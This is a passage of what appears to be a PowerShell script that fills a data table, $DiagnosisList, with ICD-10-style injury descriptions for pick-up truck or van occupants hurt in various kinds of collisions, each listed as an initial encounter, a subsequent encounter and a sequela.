nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Passenger in pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Person on outside of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Person on outside of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Person on outside of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with pedestrian or animal","Person boarding or alighting a pick-up truck or van injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with pedestrian or animal","Person boarding or alighting a pick-up truck or van injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with pedestrian or animal","Person boarding or alighting a pick-up truck or van injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Driver of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Driver of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Driver of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Passenger in pick-up truck or van injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Passenger in pick-up truck or van injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Passenger in pick-up truck or van injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Person on outside of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Person on outside of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Person on outside of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Driver of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Driver of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Driver of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Passenger in pick-up truck or van injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Passenger in pick-up truck or van injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Passenger in pick-up truck or van injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with pedal cycle","Person boarding or alighting a pick-up truck or van injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with pedal cycle","Person boarding or alighting a pick-up truck or van injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with pedal cycle","Person boarding or alighting a pick-up truck or van injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedal cycle in traffic accident","Driver of pick-up truck or van injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedal cycle in traffic accident","Driver of pick-up truck or van injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedal cycle in traffic accident","Driver of pick-up truck or van injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedal cycle in traffic accident","Passenger in pick-up truck or van injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedal cycle in traffic accident","Passenger in pick-up truck or van injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedal cycle in traffic accident","Passenger in pick-up truck or van injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedal cycle in traffic accident","Person on outside of pick-up truck or van injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedal cycle in traffic accident","Person on outside of pick-up truck or van injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with pedal cycle in traffic accident","Person on outside of pick-up truck or van injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a pick-up truck or van injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a pick-up truck or van injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a pick-up truck or van injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Driver of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Driver of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Driver of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with car, pick-up truck or van","Person boarding or alighting a pick-up truck or van injured in collision with car, pick-up truck or van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with car, pick-up truck or van","Person boarding or alighting a pick-up truck or van injured in collision with car, pick-up truck or van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with car, pick-up truck or van","Person boarding or alighting a pick-up truck or van injured in collision with car, pick-up truck or van, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Driver of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Driver of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Driver of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Passenger in pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Person on outside of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with heavy transport vehicle or bus","Person boarding or alighting a pick-up truck or van injured in collision with heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with heavy transport vehicle or bus","Person boarding or alighting a pick-up truck or van injured in collision with heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with heavy transport vehicle or bus","Person boarding or alighting a pick-up truck or van injured in collision with heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Driver of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with railway train or railway vehicle","Person boarding or alighting a pick-up truck or van injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with railway train or railway vehicle","Person boarding or alighting a pick-up truck or van injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with railway train or railway vehicle","Person boarding or alighting a pick-up truck or van injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Driver of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Driver of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = 